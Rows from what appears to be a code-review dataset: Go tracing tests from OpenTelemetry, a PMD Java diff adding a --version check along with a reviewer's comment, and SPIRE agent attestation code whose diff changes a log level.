diff := math.Abs(got - tc.expect)
if diff > tolerance {
t.Errorf("got %f (diff: %f), expected %f (w/tolerance: %f)", got, diff, tc.expect, tolerance)
}
})
}
}
func TestStartSpanWithParent(t *testing.T) {
tp, _ := NewProvider()
tr := tp.Tracer("SpanWithParent")
ctx := context.Background()
sc1 := core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 0x0,
}
_, s1 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc1), "span1-unsampled-parent1")
if err := checkChild(sc1, s1); err != nil {
t.Error(err)
}
_, s2 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc1), "span2-unsampled-parent1")
if err := checkChild(sc1, s2); err != nil {
t.Error(err)
}
sc2 := core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 0x1,
//Tracestate: testTracestate,
}
_, s3 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc2), "span3-sampled-parent2")
if err := checkChild(sc2, s3); err != nil {
t.Error(err)
}
ctx2, s4 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, sc2), "span4-sampled-parent2")
if err := checkChild(sc2, s4); err != nil {
t.Error(err)
}
s4Sc := s4.SpanContext()
_, s5 := tr.Start(ctx2, "span5-implicit-childof-span4")
if err := checkChild(s4Sc, s5); err != nil {
t.Error(err)
}
}
func TestSetSpanAttributesOnStart(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp,
"StartSpanAttribute",
apitrace.WithAttributes(key.String("key1", "value1")),
apitrace.WithAttributes(key.String("key2", "value2")),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Attributes: []core.KeyValue{
key.String("key1", "value1"),
key.String("key2", "value2"),
},
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanAttributesOnStart: -got +want %s", diff)
}
}
func TestSetSpanAttributes(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "SpanAttribute")
span.SetAttributes(key.New("key1").String("value1"))
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Attributes: []core.KeyValue{
key.String("key1", "value1"),
},
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanAttributes: -got +want %s", diff)
}
}
func TestSetSpanAttributesOverLimit(t *testing.T) {
te := &testExporter{}
cfg := Config{MaxAttributesPerSpan: 2}
tp, _ := NewProvider(WithConfig(cfg), WithSyncer(te))
span := startSpan(tp, "SpanAttributesOverLimit")
span.SetAttributes(
key.Bool("key1", true),
key.String("key2", "value2"),
key.Bool("key1", false), // Replace key1.
key.Int64("key4", 4), // Remove key2 and add key4
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Attributes: []core.KeyValue{
key.Bool("key1", false),
key.Int64("key4", 4),
},
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
DroppedAttributeCount: 1,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanAttributesOverLimit: -got +want %s", diff)
}
}
func TestEvents(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "Events")
k1v1 := key.New("key1").String("value1")
k2v2 := key.Bool("key2", true)
k3v3 := key.Int64("key3", 3)
span.AddEvent(context.Background(), "foo", key.New("key1").String("value1"))
span.AddEvent(context.Background(), "bar",
key.Bool("key2", true),
key.Int64("key3", 3),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
for i := range got.MessageEvents {
if !checkTime(&got.MessageEvents[i].Time) {
t.Error("exporting span: expected nonzero Event Time")
}
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
HasRemoteParent: true,
MessageEvents: []export.Event{
{Name: "foo", Attributes: []core.KeyValue{k1v1}},
{Name: "bar", Attributes: []core.KeyValue{k2v2, k3v3}},
},
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Message Events: -got +want %s", diff)
}
}
func TestEventsOverLimit(t *testing.T) {
te := &testExporter{}
cfg := Config{MaxEventsPerSpan: 2}
tp, _ := NewProvider(WithConfig(cfg), WithSyncer(te))
span := startSpan(tp, "EventsOverLimit")
k1v1 := key.New("key1").String("value1")
k2v2 := key.Bool("key2", false)
k3v3 := key.New("key3").String("value3")
span.AddEvent(context.Background(), "fooDrop", key.New("key1").String("value1"))
span.AddEvent(context.Background(), "barDrop",
key.Bool("key2", true),
key.New("key3").String("value3"),
)
span.AddEvent(context.Background(), "foo", key.New("key1").String("value1"))
span.AddEvent(context.Background(), "bar",
key.Bool("key2", false),
key.New("key3").String("value3"),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
for i := range got.MessageEvents {
if !checkTime(&got.MessageEvents[i].Time) {
t.Error("exporting span: expected nonzero Event Time")
}
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
MessageEvents: []export.Event{
{Name: "foo", Attributes: []core.KeyValue{k1v1}},
{Name: "bar", Attributes: []core.KeyValue{k2v2, k3v3}},
},
DroppedMessageEventCount: 2,
HasRemoteParent: true,
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Message Event over limit: -got +want %s", diff)
}
}
func TestLinks(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
k1v1 := key.New("key1").String("value1")
k2v2 := key.New("key2").String("value2")
k3v3 := key.New("key3").String("value3")
sc1 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
sc2 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
span := startSpan(tp, "Links",
apitrace.LinkedTo(sc1, key.New("key1").String("value1")),
apitrace.LinkedTo(sc2,
key.New("key2").String("value2"),
key.New("key3").String("value3"),
),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
HasRemoteParent: true,
Links: []apitrace.Link{
{SpanContext: sc1, Attributes: []core.KeyValue{k1v1}},
{SpanContext: sc2, Attributes: []core.KeyValue{k2v2, k3v3}},
},
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Link: -got +want %s", diff)
}
}
func TestLinksOverLimit(t *testing.T) {
te := &testExporter{}
cfg := Config{MaxLinksPerSpan: 2}
sc1 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
sc2 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
sc3 := core.SpanContext{TraceID: core.TraceID([16]byte{1, 1}), SpanID: core.SpanID{3}}
tp, _ := NewProvider(WithConfig(cfg), WithSyncer(te))
span := startSpan(tp, "LinksOverLimit",
apitrace.LinkedTo(sc1, key.New("key1").String("value1")),
apitrace.LinkedTo(sc2, key.New("key2").String("value2")),
apitrace.LinkedTo(sc3, key.New("key3").String("value3")),
)
k2v2 := key.New("key2").String("value2")
k3v3 := key.New("key3").String("value3")
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
Links: []apitrace.Link{
{SpanContext: sc2, Attributes: []core.KeyValue{k2v2}},
{SpanContext: sc3, Attributes: []core.KeyValue{k3v3}},
},
DroppedLinkCount: 1,
HasRemoteParent: true,
SpanKind: apitrace.SpanKindInternal,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("Link over limit: -got +want %s", diff)
}
}
func TestSetSpanName(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
ctx := context.Background()
want := "SpanName-1"
ctx = apitrace.ContextWithRemoteSpanContext(ctx, core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 1,
})
_, span := tp.Tracer("SetSpanName").Start(ctx, "SpanName-1")
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
if got.Name != want {
t.Errorf("span.Name: got %q; want %q", got.Name, want)
}
}
func TestSetSpanStatus(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "SpanStatus")
span.SetStatus(codes.Canceled)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
Status: codes.Canceled,
HasRemoteParent: true,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SetSpanStatus: -got +want %s", diff)
}
}
func cmpDiff(x, y interface{}) string {
return cmp.Diff(x, y, cmp.AllowUnexported(core.Value{}), cmp.AllowUnexported(export.Event{}))
}
func remoteSpanContext() core.SpanContext {
return core.SpanContext{
TraceID: tid,
SpanID: sid,
TraceFlags: 1,
}
}
// checkChild is test utility function that tests that c has fields set appropriately,
// given that it is a child span of p.
func checkChild(p core.SpanContext, apiSpan apitrace.Span) error {
s := apiSpan.(*span)
if s == nil {
return fmt.Errorf("got nil child span, want non-nil")
}
if got, want := s.spanContext.TraceIDString(), p.TraceIDString(); got != want {
return fmt.Errorf("got child trace ID %s, want %s", got, want)
}
if childID, parentID := s.spanContext.SpanIDString(), p.SpanIDString(); childID == parentID {
return fmt.Errorf("got child span ID %s, parent span ID %s; want unequal IDs", childID, parentID)
}
if got, want := s.spanContext.TraceFlags, p.TraceFlags; got != want {
return fmt.Errorf("got child trace options %d, want %d", got, want)
}
// TODO [rgheita] : Fix tracestate test
//if got, want := c.spanContext.Tracestate, p.Tracestate; got != want {
// return fmt.Errorf("got child tracestate %v, want %v", got, want)
//}
return nil
}
// startSpan starts a span with a name "span0". See startNamedSpan for
// details.
func startSpan(tp *Provider, trName string, args ...apitrace.StartOption) apitrace.Span {
return startNamedSpan(tp, trName, "span0", args...)
}
// startNamed Span is a test utility func that starts a span with a
// passed name and with remote span context as parent. The remote span
// context contains TraceFlags with sampled bit set. This allows the
// span to be automatically sampled.
func startNamedSpan(tp *Provider, trName, name string, args ...apitrace.StartOption) apitrace.Span {
ctx := context.Background()
ctx = apitrace.ContextWithRemoteSpanContext(ctx, remoteSpanContext())
args = append(args, apitrace.WithRecord())
_, span := tp.Tracer(trName).Start(
ctx,
name,
args...,
)
return span
}
// endSpan is a test utility function that ends the span in the context and
// returns the exported export.SpanData.
// It requires that span be sampled using one of these methods
// 1. Passing parent span context in context
// 2. Use WithSampler(AlwaysSample())
// 3. Configuring AlwaysSample() as default sampler
//
// It also does some basic tests on the span.
// It also clears spanID in the export.SpanData to make the comparison easier.
func endSpan(te *testExporter, span apitrace.Span) (*export.SpanData, error) {
if !span.IsRecording() {
return nil, fmt.Errorf("IsRecording: got false, want true")
}
if !span.SpanContext().IsSampled() {
return nil, fmt.Errorf("IsSampled: got false, want true")
}
span.End()
if len(te.spans) != 1 {
return nil, fmt.Errorf("got exported spans %#v, want one span", te.spans)
}
got := te.spans[0]
if !got.SpanContext.SpanID.IsValid() {
return nil, fmt.Errorf("exporting span: expected nonzero SpanID")
}
got.SpanContext.SpanID = core.SpanID{}
if !checkTime(&got.StartTime) {
return nil, fmt.Errorf("exporting span: expected nonzero StartTime")
}
if !checkTime(&got.EndTime) {
return nil, fmt.Errorf("exporting span: expected nonzero EndTime")
}
return got, nil
}
// checkTime checks that a nonzero time was set in x, then clears it.
func checkTime(x *time.Time) bool {
if x.IsZero() {
return false
}
*x = time.Time{}
return true
}
type fakeExporter map[string]*export.SpanData
func (f fakeExporter) ExportSpan(ctx context.Context, s *export.SpanData) {
f[s.Name] = s
}
func TestEndSpanTwice(t *testing.T) {
spans := make(fakeExporter)
tp, _ := NewProvider(WithSyncer(spans))
span := startSpan(tp, "EndSpanTwice")
span.End()
span.End()
if len(spans) != 1 {
t.Fatalf("expected only a single span, got %#v", spans)
}
}
func TestStartSpanAfterEnd(t *testing.T) {
spans := make(fakeExporter)
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: AlwaysSample()}), WithSyncer(spans))
ctx := context.Background()
tr := tp.Tracer("SpanAfterEnd")
ctx, span0 := tr.Start(apitrace.ContextWithRemoteSpanContext(ctx, remoteSpanContext()), "parent")
ctx1, span1 := tr.Start(ctx, "span-1")
span1.End()
// Start a new span with the context containing span-1
// even though span-1 is ended, we still add this as a new child of span-1
_, span2 := tr.Start(ctx1, "span-2")
span2.End()
span0.End()
if got, want := len(spans), 3; got != want {
t.Fatalf("len(%#v) = %d; want %d", spans, got, want)
}
gotParent, ok := spans["parent"]
if !ok {
t.Fatal("parent not recorded")
}
gotSpan1, ok := spans["span-1"]
if !ok {
t.Fatal("span-1 not recorded")
}
gotSpan2, ok := spans["span-2"]
if !ok {
t.Fatal("span-2 not recorded")
}
if got, want := gotSpan1.SpanContext.TraceID, gotParent.SpanContext.TraceID; got != want {
t.Errorf("span-1.TraceID=%q; want %q", got, want)
}
if got, want := gotSpan2.SpanContext.TraceID, gotParent.SpanContext.TraceID; got != want {
t.Errorf("span-2.TraceID=%q; want %q", got, want)
}
if got, want := gotSpan1.ParentSpanID, gotParent.SpanContext.SpanID; got != want {
t.Errorf("span-1.ParentSpanID=%q; want %q (parent.SpanID)", got, want)
}
if got, want := gotSpan2.ParentSpanID, gotSpan1.SpanContext.SpanID; got != want {
t.Errorf("span-2.ParentSpanID=%q; want %q (span1.SpanID)", got, want)
}
}
func TestChildSpanCount(t *testing.T) {
spans := make(fakeExporter)
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: AlwaysSample()}), WithSyncer(spans))
tr := tp.Tracer("ChidSpanCount")
ctx, span0 := tr.Start(context.Background(), "parent")
ctx1, span1 := tr.Start(ctx, "span-1")
_, span2 := tr.Start(ctx1, "span-2")
span2.End()
span1.End()
_, span3 := tr.Start(ctx, "span-3")
span3.End()
span0.End()
if got, want := len(spans), 4; got != want {
t.Fatalf("len(%#v) = %d; want %d", spans, got, want)
}
gotParent, ok := spans["parent"]
if !ok {
t.Fatal("parent not recorded")
}
gotSpan1, ok := spans["span-1"]
if !ok {
t.Fatal("span-1 not recorded")
}
gotSpan2, ok := spans["span-2"]
if !ok {
t.Fatal("span-2 not recorded")
}
gotSpan3, ok := spans["span-3"]
if !ok {
t.Fatal("span-3 not recorded")
}
if got, want := gotSpan3.ChildSpanCount, 0; got != want {
t.Errorf("span-3.ChildSpanCount=%q; want %q", got, want)
}
if got, want := gotSpan2.ChildSpanCount, 0; got != want {
t.Errorf("span-2.ChildSpanCount=%q; want %q", got, want)
}
if got, want := gotSpan1.ChildSpanCount, 1; got != want {
t.Errorf("span-1.ChildSpanCount=%q; want %q", got, want)
}
if got, want := gotParent.ChildSpanCount, 2; got != want {
t.Errorf("parent.ChildSpanCount=%q; want %q", got, want)
}
}
func TestNilSpanEnd(t *testing.T) {
var span *span
span.End()
}
func TestExecutionTracerTaskEnd(t *testing.T) {
var n uint64
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: NeverSample()}))
tr := tp.Tracer("Execution Tracer Task End")
executionTracerTaskEnd := func() {
atomic.AddUint64(&n, 1)
}
var spans []*span
_, apiSpan := tr.Start(context.Background(), "foo")
s := apiSpan.(*span)
s.executionTracerTaskEnd = executionTracerTaskEnd
spans = append(spans, s) // never sample
tID, _ := core.TraceIDFromHex("0102030405060708090a0b0c0d0e0f")
sID, _ := core.SpanIDFromHex("0001020304050607")
ctx := context.Background()
ctx = apitrace.ContextWithRemoteSpanContext(ctx,
core.SpanContext{
TraceID: tID,
SpanID: sID,
TraceFlags: 0,
},
)
_, apiSpan = tr.Start(
ctx,
"foo",
)
s = apiSpan.(*span)
s.executionTracerTaskEnd = executionTracerTaskEnd
spans = append(spans, s) // parent not sampled
//tp.ApplyConfig(Config{DefaultSampler: AlwaysSample()})
_, apiSpan = tr.Start(context.Background(), "foo")
s = apiSpan.(*span)
s.executionTracerTaskEnd = executionTracerTaskEnd
spans = append(spans, s) // always sample
for _, span := range spans {
span.End()
}
if got, want := n, uint64(len(spans)); got != want {
t.Fatalf("Execution tracer task ended for %v spans; want %v", got, want)
}
}
func TestCustomStartEndTime(t *testing.T) {
var te testExporter
tp, _ := NewProvider(WithSyncer(&te), WithConfig(Config{DefaultSampler: AlwaysSample()}))
startTime := time.Date(2019, time.August, 27, 14, 42, 0, 0, time.UTC)
endTime := startTime.Add(time.Second * 20)
_, span := tp.Tracer("Custom Start and End time").Start(
context.Background(),
"testspan",
apitrace.WithStartTime(startTime),
)
span.End(apitrace.WithEndTime(endTime))
if len(te.spans) != 1 {
t.Fatalf("got exported spans %#v, want one span", te.spans)
}
got := te.spans[0]
if got.StartTime != startTime {
t.Errorf("expected start time to be %s, got %s", startTime, got.StartTime)
}
if got.EndTime != endTime {
t.Errorf("expected end time to be %s, got %s", endTime, got.EndTime)
}
}
func TestRecordError(t *testing.T) {
scenarios := []struct {
err error
typ string
msg string
}{
{
err: ottest.NewTestError("test error"),
typ: "go.opentelemetry.io/otel/internal/testing.TestError",
msg: "test error",
},
{
err: errors.New("test error 2"),
typ: "*errors.errorString",
msg: "test error 2",
},
}
for _, s := range scenarios {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "RecordError")
errTime := time.Now()
span.RecordError(context.Background(), s.err,
apitrace.WithErrorTime(errTime),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
MessageEvents: []export.Event{
{
Name: errorEventName,
Time: errTime,
Attributes: []core.KeyValue{
errorTypeKey.String(s.typ),
errorMessageKey.String(s.msg),
},
},
},
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SpanErrorOptions: -got +want %s", diff)
}
}
}
func TestRecordErrorWithStatus(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "RecordErrorWithStatus")
testErr := ottest.NewTestError("test error")
errTime := time.Now()
testStatus := codes.Unknown
span.RecordError(context.Background(), testErr,
apitrace.WithErrorTime(errTime),
apitrace.WithErrorStatus(testStatus),
)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
Status: codes.Unknown,
HasRemoteParent: true,
MessageEvents: []export.Event{
{
Name: errorEventName,
Time: errTime,
Attributes: []core.KeyValue{
errorTypeKey.String("go.opentelemetry.io/otel/internal/testing.TestError"),
errorMessageKey.String("test error"),
},
},
},
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SpanErrorOptions: -got +want %s", diff)
}
}
func TestRecordErrorNil(t *testing.T) {
te := &testExporter{}
tp, _ := NewProvider(WithSyncer(te))
span := startSpan(tp, "RecordErrorNil")
span.RecordError(context.Background(), nil)
got, err := endSpan(te, span)
if err != nil {
t.Fatal(err)
}
want := &export.SpanData{
SpanContext: core.SpanContext{
TraceID: tid,
TraceFlags: 0x1,
},
ParentSpanID: sid,
Name: "span0",
SpanKind: apitrace.SpanKindInternal,
HasRemoteParent: true,
Status: codes.OK,
}
if diff := cmpDiff(got, want); diff != "" {
t.Errorf("SpanErrorOptions: -got +want %s", diff)
}
}
func TestWithSpanKind(t *testing.T) {
var te testExporter
tp, _ := NewProvider(WithSyncer(&te), WithConfig(Config{DefaultSampler: AlwaysSample()}))
tr := tp.Tracer("withSpanKind")
_, span := tr.Start(context.Background(), "WithoutSpanKind")
spanData, err := endSpan(&te, span)
if err != nil {
t.Error(err.Error())
}
if spanData.SpanKind != apitrace.SpanKindInternal {
t.Errorf("Default value of Spankind should be Internal: got %+v, want %+v\n", spanData.SpanKind, apitrace.SpanKindInternal)
}
sks := []apitrace.SpanKind{
apitrace.SpanKindInternal,
apitrace.SpanKindServer,
apitrace.SpanKindClient,
apitrace.SpanKindProducer,
apitrace.SpanKindConsumer,
}
for _, sk := range sks {
te.spans = nil
_, span := tr.Start(context.Background(), fmt.Sprintf("SpanKind-%v", sk), apitrace.WithSpanKind(sk))
spanData, err := endSpan(&te, span)
if err != nil {
t.Error(err.Error())
}
if spanData.SpanKind != sk {
t.Errorf("WithSpanKind check: got %+v, want %+v\n", spanData.SpanKind, sks)
}
}
}
| 1 | 11,327 | This tests seems it was broken from the start :joy:. It "worked" because the old sample chance was small enough that this have always be off. Thanks for fixing this. Could you also change the strings on this test? `"Recording off"` and `"new span is recording events"` | open-telemetry-opentelemetry-go | go |
@@ -44,6 +44,14 @@ public final class PmdParametersParseResult {
return !isError() && result.isHelp();
}
+ /**
+ * Returns whether parsing just requested the {@code --version} text.
+ * In this case no configuration is produced.
+ */
+ public boolean isVersion() {
+ return !isError() && result.isVersion();
+ }
+
/**
* Returns the error if parsing failed. Parsing may fail if required
* parameters are not provided, or if some parameters don't pass validation. | 1 | /*
* BSD-style license; for more info see http://pmd.sourceforge.net/license.html
*/
package net.sourceforge.pmd.cli;
import java.util.Objects;
import net.sourceforge.pmd.PMDConfiguration;
import com.beust.jcommander.JCommander;
import com.beust.jcommander.ParameterException;
/**
* Result of parsing a bunch of CLI arguments. Parsing may fail with an
* exception, or succeed and produce a {@link PMDConfiguration}. If the
* {@code --help} argument is mentioned, no configuration is produced.
*/
public final class PmdParametersParseResult {
private final PMDParameters result;
private final ParameterException error;
PmdParametersParseResult(PMDParameters result) {
this.result = Objects.requireNonNull(result);
this.error = null;
}
PmdParametersParseResult(ParameterException error) {
this.result = null;
this.error = Objects.requireNonNull(error);
}
/** Returns true if parsing failed. */
public boolean isError() {
return result == null;
}
/**
* Returns whether parsing just requested the {@code --help} text.
* In this case no configuration is produced.
*/
public boolean isHelp() {
return !isError() && result.isHelp();
}
/**
* Returns the error if parsing failed. Parsing may fail if required
* parameters are not provided, or if some parameters don't pass validation.
* Otherwise returns null.
*/
public ParameterException getError() {
return error;
}
/**
* Returns the resulting configuration if parsing succeeded and not {@link #isHelp().
* Otherwise returns null.
*/
public PMDConfiguration toConfiguration() {
return result != null && !isHelp() ? result.toConfiguration() : null;
}
/**
* Parse an array of CLI parameters and returns a result (which may be failed).
* Use this instead of {@link PMDCommandLineInterface#extractParameters(PMDParameters, String[], String)},
* because that one may terminate the VM.
*
* @param args Array of parameters
*
* @return A parse result
*
* @throws NullPointerException If the parameter array is null
*/
public static PmdParametersParseResult extractParameters(String... args) {
Objects.requireNonNull(args, "Null parameter array");
PMDParameters result = new PMDParameters();
JCommander jcommander = new JCommander(result);
jcommander.setProgramName("pmd");
try {
jcommander.parse(args);
return new PmdParametersParseResult(result);
} catch (ParameterException e) {
return new PmdParametersParseResult(e);
}
}
}
| 1 | 19,201 | This is not actually the case, you need to modify `toConfiguration` below to prevent a configuration from being produced | pmd-pmd | java |
@@ -88,7 +88,7 @@ func (a *attestor) loadSVID(ctx context.Context) (*x509.Certificate, *ecdsa.Priv
svid := a.readSVIDFromDisk()
if len(fResp.PrivateKey) > 0 && svid == nil {
- a.c.Log.Warn("Private key recovered, but no SVID found")
+ a.c.Log.Debug("Private key recovered, but no SVID found")
}
var keyData []byte | 1 | package attestor
import (
"context"
"crypto/ecdsa"
"crypto/tls"
"crypto/x509"
"errors"
"fmt"
"io"
"net/url"
"path"
"github.com/sirupsen/logrus"
spiffe_tls "github.com/spiffe/go-spiffe/tls"
"github.com/spiffe/spire/pkg/agent/catalog"
"github.com/spiffe/spire/pkg/agent/manager"
"github.com/spiffe/spire/pkg/common/grpcutil"
"github.com/spiffe/spire/pkg/common/util"
"github.com/spiffe/spire/proto/agent/keymanager"
"github.com/spiffe/spire/proto/agent/nodeattestor"
"github.com/spiffe/spire/proto/api/node"
"github.com/spiffe/spire/proto/common"
"google.golang.org/grpc"
"google.golang.org/grpc/credentials"
)
type AttestationResult struct {
SVID *x509.Certificate
Key *ecdsa.PrivateKey
Bundle []*x509.Certificate
}
type Attestor interface {
Attest(ctx context.Context) (*AttestationResult, error)
}
type Config struct {
Catalog catalog.Catalog
JoinToken string
TrustDomain url.URL
TrustBundle []*x509.Certificate
BundleCachePath string
SVIDCachePath string
Log logrus.FieldLogger
ServerAddress string
NodeClient node.NodeClient
}
type attestor struct {
c *Config
}
func New(config *Config) Attestor {
return &attestor{c: config}
}
func (a *attestor) Attest(ctx context.Context) (*AttestationResult, error) {
bundle, err := a.loadBundle()
if err != nil {
return nil, err
}
svid, key, err := a.loadSVID(ctx)
if err != nil {
return nil, err
}
if svid == nil {
svid, bundle, err = a.newSVID(ctx, key, bundle)
if err != nil {
return nil, err
}
}
return &AttestationResult{Bundle: bundle, SVID: svid, Key: key}, nil
}
func (a *attestor) loadSVID(ctx context.Context) (*x509.Certificate, *ecdsa.PrivateKey, error) {
mgrs := a.c.Catalog.KeyManagers()
if len(mgrs) > 1 {
return nil, nil, errors.New("more than one key manager configured")
}
mgr := mgrs[0]
fResp, err := mgr.FetchPrivateKey(ctx, &keymanager.FetchPrivateKeyRequest{})
if err != nil {
return nil, nil, fmt.Errorf("load private key: %v", err)
}
svid := a.readSVIDFromDisk()
if len(fResp.PrivateKey) > 0 && svid == nil {
a.c.Log.Warn("Private key recovered, but no SVID found")
}
var keyData []byte
if len(fResp.PrivateKey) > 0 && svid != nil {
keyData = fResp.PrivateKey
} else {
gResp, err := mgr.GenerateKeyPair(ctx, &keymanager.GenerateKeyPairRequest{})
if err != nil {
return nil, nil, fmt.Errorf("generate key pair: %s", err)
}
svid = nil
keyData = gResp.PrivateKey
}
key, err := x509.ParseECPrivateKey(keyData)
if err != nil {
return nil, nil, fmt.Errorf("parse key from keymanager: %v", key)
}
return svid, key, nil
}
func (a *attestor) loadBundle() ([]*x509.Certificate, error) {
bundle, err := manager.ReadBundle(a.c.BundleCachePath)
if err == manager.ErrNotCached {
bundle = a.c.TrustBundle
} else if err != nil {
return nil, err
}
if bundle == nil {
return nil, errors.New("load bundle: no bundle provided")
}
if len(bundle) < 1 {
return nil, errors.New("load bundle: no certs in bundle")
}
return bundle, nil
}
func (a *attestor) fetchAttestationData(
fetchStream nodeattestor.FetchAttestationData_Stream,
challenge []byte) (*nodeattestor.FetchAttestationDataResponse, error) {
// the stream should only be nil if this node attestation is via a join
// token.
if fetchStream == nil {
data := &common.AttestationData{
Type: "join_token",
Data: []byte(a.c.JoinToken),
}
id := &url.URL{
Scheme: "spiffe",
Host: a.c.TrustDomain.Host,
Path: path.Join("spire", "agent", "join_token", a.c.JoinToken),
}
return &nodeattestor.FetchAttestationDataResponse{
AttestationData: data,
SpiffeId: id.String(),
}, nil
}
if challenge != nil {
fetchReq := &nodeattestor.FetchAttestationDataRequest{
Challenge: challenge,
}
if err := fetchStream.Send(fetchReq); err != nil {
return nil, fmt.Errorf("requesting attestation data: %v", err)
}
}
fetchResp, err := fetchStream.Recv()
if err != nil {
return nil, fmt.Errorf("receiving attestation data: %v", err)
}
return fetchResp, nil
}
// Read agent SVID from data dir. If an error is encountered, it will be logged and `nil`
// will be returned.
func (a *attestor) readSVIDFromDisk() *x509.Certificate {
cert, err := manager.ReadSVID(a.c.SVIDCachePath)
if err == manager.ErrNotCached {
a.c.Log.Debug("No pre-existing agent SVID found. Will perform node attestation")
return nil
} else if err != nil {
a.c.Log.Warnf("Could not get agent SVID from %s: %s", a.c.SVIDCachePath, err)
}
return cert
}
// newSVID obtains an agent svid for the given private key by performing node attesatation. The bundle is
// necessary in order to validate the SPIRE server we are attesting to. Returns the SVID and an updated bundle.
func (a *attestor) newSVID(ctx context.Context, key *ecdsa.PrivateKey, bundle []*x509.Certificate) (*x509.Certificate, []*x509.Certificate, error) {
// make sure all of the streams are cancelled if something goes awry
ctx, cancel := context.WithCancel(ctx)
defer cancel()
var fetchStream nodeattestor.FetchAttestationData_Stream
if a.c.JoinToken == "" {
plugins := a.c.Catalog.NodeAttestors()
if len(plugins) > 1 {
return nil, nil, errors.New("more than one node attestor configured")
}
attestor := plugins[0]
var err error
fetchStream, err = attestor.FetchAttestationData(ctx)
if err != nil {
return nil, nil, fmt.Errorf("opening stream for fetching attestation: %v", err)
}
}
conn, err := a.serverConn(ctx, bundle)
if err != nil {
return nil, nil, fmt.Errorf("create attestation client: %v", err)
}
defer conn.Close()
if a.c.NodeClient == nil {
a.c.NodeClient = node.NewNodeClient(conn)
}
attestStream, err := a.c.NodeClient.Attest(ctx)
if err != nil {
return nil, nil, fmt.Errorf("opening stream for attestation: %v", err)
}
var spiffeID string
var csr []byte
attestResp := new(node.AttestResponse)
for {
data, err := a.fetchAttestationData(fetchStream, attestResp.Challenge)
if err != nil {
return nil, nil, err
}
// (re)generate the SVID if the spiffeid changes.
